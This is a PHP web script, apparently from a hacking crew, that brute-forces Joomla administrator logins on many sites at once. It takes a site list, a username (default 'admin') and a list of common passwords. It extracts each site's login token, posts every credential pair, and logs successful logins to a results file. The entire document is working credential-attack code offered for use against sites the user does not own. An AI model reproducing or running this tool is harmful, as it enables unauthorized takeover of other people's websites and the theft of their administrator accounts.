Joomla Bruteforce attack PHP

1. __ __ _ _ _ ___
2. \ \/ /_ __ | | ___ (_) |_ ___ _ __ ___ / __\ __ _____ __
3. \ /| '_ \| |/ _ \| | __/ _ \ '__/ __| / / | '__/ _ \ \ /\ / /
4. / \| |_) | | (_) | | || __/ | \__ \ / /__| | | __/\ V V /
5. /_/\_\ .__/|_|\___/|_|\__\___|_| |___/ \____/_| \___| \_/\_/
6. |_|
7.  
8.  
9.  
10. <html>
11. <head>
12. <link href="http://i.imgur.com/jKy0y.jpg" type="image/x-icon" rel="shortcut icon" />
13. <meta name="author" content="RetnOHacK" />
14. <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
15. <meta name="description" content="RetnOHacK #Procoder'z Team Black Ghost" />
16. <title>./Joomla Bruter Force</title>
17.  
18. <style type='text/css'>
19. input[type=submit], input[type=button], input[type=reset]{
20. text-align:center;
21. background:url(http://i46.tinypic.com/aloifo.png) repeat-x center bottom #666666;
22. border:1px solid #4D4D4D;
23. color:#FFFFFF;
24. border-top-color:#565656;
25. padding:4px 6px;
26. margin:4px 5px;
27. height:16px;
28. -moz-box-shadow:0 0 1px black;
29. -webkit-box-shadow:0 0 1px black;
30. box-shadow:0 0 1px black;
31. text-shadow:0 1px black;
32. -moz-border-radius:4px;
33. -webkit-border-radius:4px;
34. -khtml-border-radius:4px;
35. border-radius:4px;
36. height:23px;
37. }
38.  
39.  
40. input[type=text], input[type=password]{
41. background:url) repeat-x center bottom #666666;
42. border:1px solid #4D4D4D;
43. color:#CCCCCC;
44. border-top-color:#565656;
45. -moz-box-shadow:0 0 1px black;
46. -webkit-box-shadow:0 0 1px black;
47. box-shadow:0 0 1px black;
48. -moz-border-radius:4px;
49. -webkit-border-radius:4px;
50. -khtml-border-radius:4px;
51. border-radius:4px;
52. height:18px;
53. margin-left: 5px;
54. }
55. input , textarea , button , body , caption , table ,area , option {
56. outline:none;
57. transition: all 0.20s ease-in-out;
58. -webkit-transition: all 0.25s ease-in-out;
59. -moz-transition: all 0.25s ease-in-out;
60. border-radius:3px;
61. -webkit-border-radius:3px;
62. -moz-border-radius:3px;
63. //border:1px solid rgba(0,0,0, 0.2);
64. /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
65. }
66. input , textarea {
67. background: url('') repeat scroll 0 0 #8B8B8B;';
68. }
69.  
70.  
71.  
72.  
73. body{
74. /* font-family : Verdana; */
75. color : #FFFFFF;
76. font-size : 14px;
77. font-family:tahoma;
78. background: url() no-repeat center top #252525;
79. }
80. input , textarea {
81. outline:none;
82. transition: all 0.20s ease-in-out;
83. -webkit-transition: all 0.25s ease-in-out;
84. -moz-transition: all 0.25s ease-in-out;
85. border-radius:3px;
86. -webkit-border-radius:3px;
87. -moz-border-radius:3px;
88. border:1px solid rgba(0,0,0, 0.2);
89. }
90. input:focus, textarea:focus {
91. outline: 0;
92. border-color: rgba(82, 168, 236, 0.8);
93. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
94. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
95. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
96.  
97.  
98. background: url('') repeat scroll 0 0 #8B8B8B;';
99. overflow: auto;
100.  
101. }
102. .x1 {}
103. .x2 {font-size:13px;
104. background-color:green;
105. color:black;}
106. hr {color:white;}
107. a {color:black;}
108. #x5 {
109. font-family:tahoma;}
110. .d1 {color :#29b01a;
111. font-family:tahoma;
112. font-size:13px;
113. font-weight:bold;}
114. #d4 {color:#29b01a;
115. font-family:tahoma;
116. font-weight:bold;}
117. </style>
118. </head>
119. </br></br>
120. <center><b><font color="lime">./Joomla Bruter Force</font></b><br /><br /><br />
121. <form method="post" action="" enctype="multipart/form-data">
122. <table width="50%" border="0">
123. <tr><td><p ><font class="d1">User :</font>
124. <input type="text" name="usr" value='admin' size="15"> </font><br /><br /></p>
125. </td></tr>
126. <tr><td><font class="d1">Sites list :</font>
127. </td><td><font class="d1" >Pass list :</font></td></tr>
128. <tr>
129. <td>
130. <textarea name="sites" cols="40" rows="13" ></textarea>
131. </td><td>
132. <textarea name="w0rds" cols="20" rows="13" >
133. admin
134. 123456
135. password
136. 102030
137. 123123
138. 12345
139. 123456789
140. pass
141. test
142. admin123
143. demo
144. !@#$%^
145. </textarea>
146. </td></tr><tr><td>
147. <font >
148. <input type="submit" name="x" value="start" id="d4">
149. </font></td></tr></table>
150. </form></center>
151. <?
152. @set_time_limit(0);
153.  
154. if($_POST['x']){
155.  
156. echo "<hr>";
157.  
158. $sites = explode("\n",$_POST["sites"]); // Get Sites
159. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt
160.  
161. $Attack = new Joomla_brute_Force(); // Active Class
162.  
163.  
164. foreach($w0rds as $pwd){
165.  
166. foreach($sites as $site){
167.  
168.  
169. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
170. flush();flush();
171.  
172. }
173.  
174. }
175.  
176. }
177.  
178.  
179. # Class & Function'z
180.  
181. function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
182.  
183. class Joomla_brute_Force{
184.  
185. public function check_it($site,$user,$pass){ // print result
186.  
187. if(eregi('com_config',$this->post($site,$user,$pass))){
188.  
189. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
190. $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f);
191. flush();
192. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
193.  
194. }
195.  
196. public function post($site,$user,$pass){ // Post -> user & pass
197.  
198. $token = $this->extract_token($site);
199.  
200. $curl=curl_init();
201.  
202. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
203. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
204. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
205. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
206. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
207. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
208. curl_setopt($curl,CURLOPT_POST,1);
209. curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
210. curl_setopt($curl,CURLOPT_TIMEOUT,20);
211.  
212. $exec=curl_exec($curl);
213. curl_close($curl);
214. return $exec;
215.  
216. }
217.  
218. public function extract_token($site){ // get token from source for -> function post
219.  
220. $source = $this->get_source($site);
221.  
222. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
223.  
224. return $token[1][0];
225.  
226. }
227.  
228. public function get_source($site){ // get source for -> function extract_token
229.  
230. $curl=curl_init();
231. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
232. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
233. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
234. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
235. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
236. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
237. curl_setopt($curl,CURLOPT_TIMEOUT,20);
238.  
239. $exec=curl_exec($curl);
240. curl_close($curl);
241. return $exec;
242.  
243. }
244.  
245. }
246. ?>